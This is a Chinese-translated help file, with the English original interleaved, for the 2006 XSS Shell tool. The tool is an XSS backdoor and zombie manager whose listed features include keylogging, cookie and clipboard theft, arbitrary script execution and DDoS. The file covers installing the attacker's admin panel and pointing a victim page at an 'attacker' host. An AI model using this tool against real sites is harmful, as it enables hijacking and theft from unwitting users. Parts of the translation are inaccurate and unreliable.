XSS Shell帮助文件翻译(原创xym5366译)
-------------------------
XSS SHELL v0.3.8
-------------------------
Ferruh Mavituna - Last Updated : 02/11/2006
-------------------------
WHAT IS XSS SHELL ?什么是XSS SHELL?
-------------------------
XSS Shell is powerful a XSS backdoor and zombie manager. This concept
first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/".
Normally in XSS attacks attacker has one shot, in XSS Shell you can
interactively send requests and get responses from victim. you can
backdoor the page.
XSS Shell是强大的一个XSS后门和僵尸(肉鸡)控制者。这观念第一次是出现
在"XSS-Proxy - http://xss-proxy.sourceforge.net/"网站上。通常在XSS攻击里
攻击者有一个注入,在XSS Shell里你能与被害机之间,交互式地发送请求和获得
答复。你能从后门操作页面。
You can steal basic auth, you can bypass IP restrictions in
administration panels, you can DDoS some systems with a permanent XSS
vulnerability etc. Attack possibilities are limited with ideas.
Basically this tool demonstrates that you can do more with XSS.
你能悄悄地授权,你能绕过IP限制,在管理控制板里,你能DDoS攻击一些有一个固
定的XSS漏洞系统等。攻击的可能性被方法限制。基本上说这个工具说明,你能做
更多的XSS攻击。
-------------------------
LICENSE 许可证
-------------------------
GNU, Check xssshell.asp for details.
GNU,检查xssshell.asp详情。
-------------------------
FEATURES 特点
-------------------------
XSS Shell has several features to gain whole access over victim. Also
you can simply add your own commands.
XSS Shell有若干个功能,可以获得全部网络的受害者。同样你能简单地加入你自
己的指令。
Most of the features can enable or disabled from configuration or can be
tweaked from source code.
功能的大部分能打开或关闭配置或能通过源程序来调整。
Features;特点:
- Regenerating Pages
新生的页面
- This is one of the key and advanced features of XSS
Shell. XSS Shell re-renders the infected page and keep user in virtual
environment. Thus even user click any links in the infected page he or
she will be still under control! (within cross-domain restrictions) In
normal XSS attacks when user leaves the page you can't do anything.
这是关键的一个XSS Shell的高级功能。XSS Shell在攻击方的虚拟环境中重复刷新
感染的页面,以保持住用户页面。因此即使用户在感染的页面里点击一些链接离开
感染页面后,他或她都将一直在控制之下!(在跨限制范围攻击中)在正常的XSS
攻击中,当用户离开页面时,你不能做任何事。
- Secondly this feature keeps the session open so even
victim follow an outside link from infected page session is not going to
timeout and you will be still in charge.
其次,这个功能保持这个页面持续连接着,所以即使受害者从感染页面连接移动到
外面的链接,也不会超时,你将能一直管理这个页面。
- Keylogger键盘记录
- Mouse Logger (click points + current DOM)鼠标记录(点击+当前
DOM)
Built-in Commands;内置指令;
- Get Keylogger Data
获取键盘记录数据
- Get Current Page (Current rendered DOM / like screenshot)
获取当前页面(当前刷新DOM/类似截图)
- Get Cookie
获取Cookie
- Execute supplied javaScript (eval)
执行存在网页上的js角本(评价)
- Get Clipboard (IE only)
获取剪贴板(只限ie)
- Get internal IP address (Firefox + JVM only)
获取内部ip地址(只限火孤浏览器+java虚拟机)
- Check victim's visited URL history
检查受害者的访问URL的历史记录
- DDoS
DDoS攻击
- Force to Crash victim's browser
暴力崩溃受害者的浏览器
-------------------------
INSTALL 安装
-------------------------
XSS Shell uses ASP + MS Access database as backend but you can simply
port them into any other server-side solution. You just need to stick
with simple communication protocol.
XSS Shell使用ASP+MS Access数据库作为后台,但你完全能接到进入任何其它的服
务器端。你只需要使用简单的通讯协议。
Install Admin Interface;
安装管理接口界面;
1. Copy "xssshell" folder into your web server
复制"xssshell"目录到你的网站服务器
2. Copy "db" to a secure place (below root)
复制"db"到一个安全的地方(根目录下)
3. Configure "database path" from "xssshell/db.asp"
在“xssshell/db.asp”里配置“数据库路径”
4. Modify hard coded password in db.asp [default password is : w00t]
在db.asp里把密码改复杂一些[预设密码是:w00t]
5. Now you can access admin interface from something like http://
[YOURHOST]/xssshell/
现在你能访问管理界面,从http://[你的主机地址]/xssshell
Configure XSS Shell for communication;
配置XSS Shell的通讯交流方案;
1. Open xssshell.asp
打开xssshell.asp文件
2. Set "SERVER" variable to where your XSSShell folder is located. i.e:
"http://[YOURHOST]/xssshell/";
设置"SERVER"变量为能被"http://[YOURHOST]/xssshell/"访问的,你的XSSShell
目录。
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you
changed filenames, folder names or some kind of different configuration
you need modify them.
检查确认一下"ME", "CONNECTOR", "COMMANDS_URL"变量。如果你改变过文件名,
目录名或不同配置的一些类型,你需要修改这几个变量。
Now open your admin interface from your browser,
To test it, just modify "sample_victim/default.asp" source code and
replace "http://attacker:81/release/xssshell.js" URL with your own XSS
Shell URL. Open "sample_victim" folder in some other browser and may be
upload in to some other server.
现在从浏览器地址上,打开你的管理界面,测试它,只是修
改"sample_victim/default.asp"的源代码,替
换"http://attacker:81/release/xssshell.js"成你自己的XSS Shell链接。在其
它的浏览器里打开"sample_victim"文件夹,可能被在一些其它服务器里上传。
Now you should see a zombie in admin interface. Just write something
into "parameters" textarea and click "alert()". You should see an alert
message in victim's browser.
现在在管理界面里,你会看到一个肉机。只要写一些东西到"parameters"文本区里
,再点击"alert()"。你就能在受害者的浏览器里看到一个警告信息。
-------------------------
SECURITY NOTES安全注意
-------------------------
- As a hunter be careful about possible "Backfire" in getSelfHTML().
Someone can hack you back or track you by another XSS or XSS Shell
attack.
作为一个猎人在getSelfHTML()函数中,要注意可能会发生“适得其反”
- Checkout "showdata.asp" and implement your own "filter()"
function to make it safer for you.
检查"showdata.asp",执行你自己的"filter()"过滤函数,让你能保证住安全。
- Put "On error resume next" to db.asp, better modify your web server to
not show any error.
放一个“在错误上恢复下一个”给db.asp,最好修改你的网页服务器不显示一些错
误。
